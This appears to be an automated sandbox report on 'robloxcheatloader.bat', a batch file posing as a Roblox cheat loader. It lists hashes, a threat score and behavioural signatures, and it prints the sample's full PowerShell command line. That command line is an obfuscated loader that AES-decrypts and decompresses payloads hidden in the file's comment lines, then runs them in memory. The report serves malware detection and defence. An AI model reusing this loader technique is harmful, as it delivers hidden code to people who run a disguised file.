Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
09/10/2024, 06:26
Static task
static1
Behavioral task
behavioral1
Sample
robloxcheatloader.bat
Resource
win7-20240729-en
4 signatures
150 seconds
General
-
Target
robloxcheatloader.bat
-
Size
297KB
-
MD5
615114ba6cad5ad7fe0e28339fbc5e51
-
SHA1
931ac91d80b1d1149aa2603d9583e9282d0f0743
-
SHA256
45b782f056d13bff3c3b4ac821455ee50b7fe7db2a273ade8a6bfa4d14ac3656
-
SHA512
305c3df8806501a72d0db6d5485f0b85cbffb994cc1fb6c57f2587af569d6a364efbf7ae3cf9f59f8dc923ca24a83a3746f7e624c6205a9b623b8db7267095fb
-
SSDEEP
6144:3HSmrJmgKx+Yv/dDTRFK74kVfSmVWYD4lzegex3aZ/SkR:350P6zqmB4lygeEYs
Score
6/10
Malware Config
Signatures
-
pid Process 2352 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2352 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2352 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2136 wrote to memory of 2352 2136 cmd.exe 31 PID 2136 wrote to memory of 2352 2136 cmd.exe 31 PID 2136 wrote to memory of 2352 2136 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\robloxcheatloader.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('i/seLlS9KmgvXypmg65Dauo9O+3ZRKIi4rg+GTJdl8k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3usiDEPfh4Azb438Ucvi6g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vDYKd=New-Object System.IO.MemoryStream(,$param_var); $uQrNw=New-Object System.IO.MemoryStream; $qgnqB=New-Object System.IO.Compression.GZipStream($vDYKd, [IO.Compression.CompressionMode]::Decompress); $qgnqB.CopyTo($uQrNw); $qgnqB.Dispose(); $vDYKd.Dispose(); $uQrNw.Dispose(); $uQrNw.ToArray();}function execute_function($param_var,$param2_var){ $CTuPF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ZNetw=$CTuPF.EntryPoint; $ZNetw.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\robloxcheatloader.bat';$fMBrf=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\robloxcheatloader.bat').Split([Environment]::NewLine);foreach ($FSzzr in $fMBrf) { if ($FSzzr.StartsWith(':: ')) { $vDoXM=$FSzzr.Substring(3); break; }}$payloads_var=[string[]]$vDoXM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352
-